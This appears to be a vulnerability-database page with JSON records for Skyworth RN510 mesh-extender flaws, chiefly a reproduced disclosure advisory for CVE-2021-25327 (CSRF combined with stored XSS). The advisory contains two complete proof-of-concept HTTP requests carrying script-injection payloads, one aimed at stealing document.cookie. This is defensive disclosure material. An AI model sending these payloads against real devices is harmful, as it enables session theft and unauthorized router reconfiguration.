        "db": "JVNDB",
        "id": "JVNDB-2021-005336"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-610"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25328"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-04-15T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-28367"
      },
      {
        "date": "2021-04-09T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-25328"
      },
      {
        "date": "2021-12-13T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-005336"
      },
      {
        "date": "2021-04-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-610"
      },
      {
        "date": "2021-04-09T13:15:13.223000",
        "db": "NVD",
        "id": "CVE-2021-25328"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-04-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-28367"
      },
      {
        "date": "2021-05-04T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-25328"
      },
      {
        "date": "2021-12-13T05:17:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-005336"
      },
      {
        "date": "2021-08-12T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-610"
      },
      {
        "date": "2024-11-21T05:54:45.690000",
        "db": "NVD",
        "id": "CVE-2021-25328"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-610"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Skyworth\u00a0Digital\u00a0Technology\u00a0RN510\u00a0 Buffer Overflow Vulnerability in Linux",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005336"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-610"
      }
    ],
    "trust": 0.6
  }
}

VAR-202104-1682

Vulnerability from variot - Updated: 2024-11-23 22:05

Skyworth Digital Technology RN510 V.3.1.0.4 contains a cross-site request forgery (CSRF) vulnerability in /cgi-bin/net-routeadd.asp and /cgi-bin/sec-urlfilter.asp. Missing CSRF protection in devices can lead to XSRF, as the above pages are vulnerable to cross-site scripting (XSS). RN510 is a dual-band wireless AC2100 access point launched by Skyworth Digital Technology. No detailed vulnerability details are currently provided. Overview

Title:- Authenticated XSRF in RN510 Mesh Extender. CVE-ID :- CVE-2021-25327 Author: Kaustubh G. Padwad Vendor: Shenzhen Skyworth Digital Technology Company Ltd.(http://www.skyworthdigital.com/products) Products: 1. RN510 with firmware V.3.1.0.4 (Tested and verified) Potential 2.RN620 with respective firmware or below 3.RN410 With Respective firmwware or below. Integrated with two gigabit LAN ports, and a dual-band AP which supports 2x2 802.11n(300Mbps) and 4x4 802.11ac (1733Mbps) concurrently, RN510provides a stable & reliable high speed wired and wireless connectivity for home user and SOHO users. Utilizing state of art EasyMesh solution, two or more RN510 units could be easily teamed upwith Skyworth ONT gateway (e.g. GN543) and form an automatically organized network. RN510 could support either wired line backhaul or wireless backhaul to other mesh node. User could enjoy a wonderful zero-touch, robust and failure auto recovery, seamless connected wireless home networking experience. RN510 uses a system of units to achieve seamless whole-home Wi-Fi coverage, eliminate weak signal areas once and for all. RN510 work together to form a unified network with a single network name. Devices automatically switch between RN510s as you move through your home for the fastest possible speeds. A RN510 Dual-pack delivers Wi-Fi to an area of up to 2,800 square feet. And if that’s not enough, simply add more RN510 to the network anytime to increase coverage. RN510 provides fast and stable connections with speeds of up to 2100 Mbps and works with major internet service provider (ISP) and modem. Parental Controls limits online time and block inappropriate websites according to unique profiles created for each family member. Setup is easier than ever with the Skywifi app there to walk you through every step.

Description:

An issue was discovered on Shenzhen Skyworth

The value of DestIPAdderss under /cgi-bin/net-routeadd.asp is not properly sanatizing hence it allow to execute malicious javascript, which result a successful cross site scripting in /cgi-bin/net-routeadd.asp, Additionally value of urlitem under /cgi-bin/sec-urlfilter.asp is also not getting properly sanitize hence it will result to successful cross site scripting.

Since device dont have CSRF valdation it is possible to perform the XSRF by using CSRF + XSS vulnerability.

Additional Information

Sample request -1

Request

POST /cgi-bin/net-routeadd.asp HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.2.1/cgi-bin/net-routeadd.asp Content-Type: application/x-www-form-urlencoded Content-Length: 235 Connection: close Cookie: UID=admin; PSW=admin; SESSIONID=boasid7a108566d118e9b5bd235b1412cb770c Upgrade-Insecure-Requests: 1

add_num=0&user_def_num=0&WanInterfaceFlag=br0&metricFlag=0&gwflag=Yes&ifflag=Yes&DestIPAddress=alert(document.cookie)&DestSubnetMask=255.255.255.255&gwStr=on&GatewayIPAddress=192.168.1.1&ifStr=on&Interface=br0&SaveFlag=1

Sample Request-2

POST /cgi-bin/sec-urlfilter.asp HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.2.1/cgi-bin/sec-urlfilter.asp Content-Type: application/x-www-form-urlencoded Content-Length: 162 Connection: close Cookie: UID=admin; PSW=admin; SESSIONID=boasid7a108566d118e9b5bd235b1412cb770c Upgrade-Insecure-Requests: 1

Save_Flag=1&Actionflag=Add&EnableUrlFilterFlag=1&delnum=&add_num=1&Url_num=1&enableFilter=on&FilterPolicy=0&urlitem=%3C%2Fscript%3E%3Csvg+onload%3Dalert%281%29%3E

[Affected Component] IpAddr function on page /cgi-bin/app-staticIP.asp inside the boa web server implementation.


[Attack Type] Remote


[Impact Code execution] true


[Impact Denial of Service] true


[Attack Vectors] An Authentiated attacker need to run set the cross site scripting payload at DestIPAddress,urlitem under /cgi-bin/net-routeadd.asp and /cgi-bin/sec-urlfilter.asp respectively in order to achive XSS.

[Vulnerability Type]

CSRF, XSS

How to Reproduce: (POC):

One can use below exploit

Attacker needs to run above requests in order to achive to XSRF.

Mitigation

[Vendor of Product] Shenzhen Skyworth Digital Technology Company Ltd.(http://www.skyworthdigital.com/products)

Disclosure:

19-Jan-2021:- reported this to vendor 19-Jan-2021:- Requested for CVE-ID

credits:

  • Kaustubh Padwad
  • Information Security Researcher
  • kingkaustubh@me.com
  • https://s3curityb3ast.github.io/
  • https://twitter.com/s3curityb3ast
  • http://breakthesec.com
  • https://www.linkedin.com/in/kaustubhpadwad

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202104-1682",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "rn510",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "skyworthdigital",
        "version": "3.1.0.4"
      },
      {
        "model": "rn510",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "skyworth digital holdings",
        "version": null
      },
      {
        "model": "rn510",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "skyworth digital holdings",
        "version": "rn510  firmware  3.1.0.4"
      },
      {
        "model": "digital technology rn510",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "skyworth",
        "version": "v.3.1.0.4"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-28368"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010305"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25327"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Kaustubh G. Padwad",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162454"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-607"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2021-25327",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CVE-2021-25327",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.9,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2021-28368",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 2.8,
            "id": "CVE-2021-25327",
            "impactScore": 3.6,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 6.5,
            "baseSeverity": "Medium",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2021-25327",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2021-25327",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2021-25327",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2021-28368",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202104-607",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-25327",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-28368"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25327"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010305"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-607"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25327"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Skyworth Digital Technology RN510 V.3.1.0.4 contains a cross-site request forgery (CSRF) vulnerability in /cgi-bin/net-routeadd.asp and /cgi-bin/sec-urlfilter.asp. Missing CSRF protection in devices can lead to XSRF, as the above pages are vulnerable to cross-site scripting (XSS). RN510 is a dual-band wireless AC2100 access point launched by Skyworth Digital Technology. No detailed vulnerability details are currently provided. Overview\n========\n\nTitle:- Authenticated XSRF in RN510 Mesh Extender. \nCVE-ID :- CVE-2021-25327\nAuthor: Kaustubh G. Padwad\nVendor: Shenzhen Skyworth Digital Technology Company\nLtd.(http://www.skyworthdigital.com/products)\nProducts:\n     1. RN510 with firmware V.3.1.0.4 (Tested and verified)\nPotential\n    2.RN620 with respective firmware or below\n    3.RN410 With Respective firmwware or below. Integrated with two\ngigabit LAN ports, and a dual-band AP which supports 2x2\n802.11n(300Mbps) and 4x4 802.11ac (1733Mbps) concurrently, RN510provides\na stable \u0026 reliable high speed wired and wireless connectivity for home\nuser and SOHO users. Utilizing state of art EasyMesh solution, two or\nmore RN510 units could be easily teamed upwith Skyworth ONT gateway\n(e.g. GN543) and form an automatically organized network. RN510 could\nsupport either wired line backhaul or wireless backhaul to other mesh\nnode. User could enjoy a wonderful zero-touch, robust and failure auto\nrecovery, seamless connected wireless home networking experience. \nRN510 uses a system of units to achieve seamless whole-home Wi-Fi\ncoverage, eliminate weak signal areas once and for all. RN510 work\ntogether to form a unified network with a single network name. Devices\nautomatically switch between RN510s as you move through your home for\nthe fastest possible speeds. A RN510 Dual-pack delivers Wi-Fi to an area\nof up to 2,800 square feet. And if that\u2019s not enough, simply add more\nRN510 to the network anytime to increase coverage. RN510 provides fast\nand stable connections with speeds of up to 2100 Mbps and works with\nmajor internet service provider (ISP) and modem. Parental Controls\nlimits online time and block inappropriate websites according to unique\nprofiles created for each family member. Setup is easier than ever with\nthe Skywifi app there to walk you through every step. \n\nDescription:\n============\nAn issue was discovered on Shenzhen Skyworth\n\nThe value of DestIPAdderss under /cgi-bin/net-routeadd.asp is not\nproperly sanatizing hence it allow to execute malicious javascript,\nwhich result a successful cross site scripting in\n/cgi-bin/net-routeadd.asp, Additionally value of urlitem under\n/cgi-bin/sec-urlfilter.asp is also not getting properly sanitize hence\nit will result to successful cross site scripting. \n\nSince device dont have CSRF valdation it is possible to perform the XSRF\nby using CSRF + XSS vulnerability. \n\n\nAdditional Information\n========================\nSample request -1\n\nRequest\n========\n\nPOST /cgi-bin/net-routeadd.asp HTTP/1.1\nHost: 192.168.2.1\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101\nFirefox/68.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.2.1/cgi-bin/net-routeadd.asp\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 235\nConnection: close\nCookie: UID=admin; PSW=admin;\nSESSIONID=boasid7a108566d118e9b5bd235b1412cb770c\nUpgrade-Insecure-Requests: 1\n\nadd_num=0\u0026user_def_num=0\u0026WanInterfaceFlag=br0\u0026metricFlag=0\u0026gwflag=Yes\u0026ifflag=Yes\u0026DestIPAddress=\u003csvg\u003e\u003cscript\n?\u003ealert(document.cookie)\u0026DestSubnetMask=255.255.255.255\u0026gwStr=on\u0026GatewayIPAddress=192.168.1.1\u0026ifStr=on\u0026Interface=br0\u0026SaveFlag=1\n\nSample Request-2\n\nPOST /cgi-bin/sec-urlfilter.asp HTTP/1.1\nHost: 192.168.2.1\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101\nFirefox/68.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.2.1/cgi-bin/sec-urlfilter.asp\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 162\nConnection: close\nCookie: UID=admin; PSW=admin;\nSESSIONID=boasid7a108566d118e9b5bd235b1412cb770c\nUpgrade-Insecure-Requests: 1\n\nSave_Flag=1\u0026Actionflag=Add\u0026EnableUrlFilterFlag=1\u0026delnum=\u0026add_num=1\u0026Url_num=1\u0026enableFilter=on\u0026FilterPolicy=0\u0026urlitem=%3C%2Fscript%3E%3Csvg+onload%3Dalert%281%29%3E\n\n\n[Affected Component]\nIpAddr function on page /cgi-bin/app-staticIP.asp inside the boa web\nserver implementation. \n\n------------------------------------------\n[Attack Type]\nRemote\n------------------------------------------\n[Impact Code execution]\ntrue\n------------------------------------------\n[Impact Denial of Service]\ntrue\n\n------------------------------------------\n[Attack Vectors]\nAn Authentiated attacker need to run set the cross site scripting\npayload at DestIPAddress,urlitem under /cgi-bin/net-routeadd.asp and\n/cgi-bin/sec-urlfilter.asp respectively in order to achive XSS. \n\n[Vulnerability Type]\n====================\nCSRF, XSS\n\nHow to Reproduce: (POC):\n========================\n\nOne can use below exploit\n\nAttacker needs to run above requests in order to achive to XSRF. \n\n\nMitigation\n==========\n\n[Vendor of Product]\nShenzhen Skyworth Digital Technology Company\nLtd.(http://www.skyworthdigital.com/products)\n\nDisclosure:\n===========\n19-Jan-2021:- reported this to vendor\n19-Jan-2021:- Requested for CVE-ID\n\n\ncredits:\n========\n* Kaustubh Padwad\n* Information Security Researcher\n* kingkaustubh@me.com\n* https://s3curityb3ast.github.io/\n* https://twitter.com/s3curityb3ast\n* http://breakthesec.com\n* https://www.linkedin.com/in/kaustubhpadwad\n\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-25327"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010305"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-28368"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25327"
      },
      {
        "db": "PACKETSTORM",
        "id": "162454"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-25327",
        "trust": 4.0
      },
      {
        "db": "PACKETSTORM",
        "id": "162454",
        "trust": 2.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010305",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-28368",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-607",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25327",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-28368"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25327"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010305"
      },
      {
        "db": "PACKETSTORM",
        "id": "162454"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-607"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25327"
      }
    ]
  },
  "id": "VAR-202104-1682",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-28368"
      }
    ],
    "trust": 1.6
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-28368"
      }
    ]
  },
  "last_update_date": "2024-11-23T22:05:08.770000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top\u00a0Page",
        "trust": 0.8,
        "url": "https://en.skyworthdigital.com/"
      },
      {
        "title": "Skyworth Digital Technology RN510 Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147345"
      },
      {
        "title": "CVE-2021-25327",
        "trust": 0.1,
        "url": "https://github.com/GoogleProjectZer0/CVE-2021-25327 "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-25327"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010305"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-607"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-352",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-79",
        "trust": 1.0
      },
      {
        "problemtype": "Cross-site request forgery (CWE-352) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010305"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25327"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.1,
        "url": "http://packetstormsecurity.com/files/162454/shenzhen-skyworth-rn510-cross-site-request-forgery-cross-site-scripting.html"
      },
      {
        "trust": 2.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-25327"
      },
      {
        "trust": 1.7,
        "url": "https://s3curityb3ast.github.io/ksa-dev-012.md"
      },
      {
        "trust": 1.7,
        "url": "http://seclists.org/fulldisclosure/2021/may/6"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/352.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/googleprojectzer0/cve-2021-25327"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://twitter.com/s3curityb3ast"
      },
      {
        "trust": 0.1,
        "url": "https://www.linkedin.com/in/kaustubhpadwad"
      },
      {
        "trust": 0.1,
        "url": "https://s3curityb3ast.github.io/"
      },
      {
        "trust": 0.1,
        "url": "http://www.skyworthdigital.com/products)"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.2.1/cgi-bin/net-routeadd.asp"
      },
      {
        "trust": 0.1,
        "url": "http://breakthesec.com"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.2.1/cgi-bin/sec-urlfilter.asp"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-28368"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25327"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010305"
      },
      {
        "db": "PACKETSTORM",
        "id": "162454"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-607"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25327"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-28368"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25327"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010305"
      },
      {
        "db": "PACKETSTORM",
        "id": "162454"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-607"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25327"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-04-15T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-28368"
      },
      {
        "date": "2021-04-09T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-25327"
      },
      {
        "date": "2022-06-29T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-010305"
      },
      {
        "date": "2021-05-04T19:16:42",
        "db": "PACKETSTORM",
        "id": "162454"
      },
      {
        "date": "2021-04-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-607"
      },
      {
        "date": "2021-04-09T13:15:13.160000",
        "db": "NVD",
        "id": "CVE-2021-25327"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-04-15T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-28368"
      },
      {
        "date": "2021-05-04T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-25327"
      },
      {
        "date": "2022-06-29T04:53:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-010305"
      },
      {
        "date": "2022-07-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-607"
      },
      {
        "date": "2024-11-21T05:54:45.540000",
        "db": "NVD",
        "id": "CVE-2021-25327"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-607"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Skyworth\u00a0Digital\u00a0Technology\u00a0RN510\u00a0 Cross-site request forgery vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010305"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "XSS",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-607"
      }
    ],
    "trust": 0.6
  }
}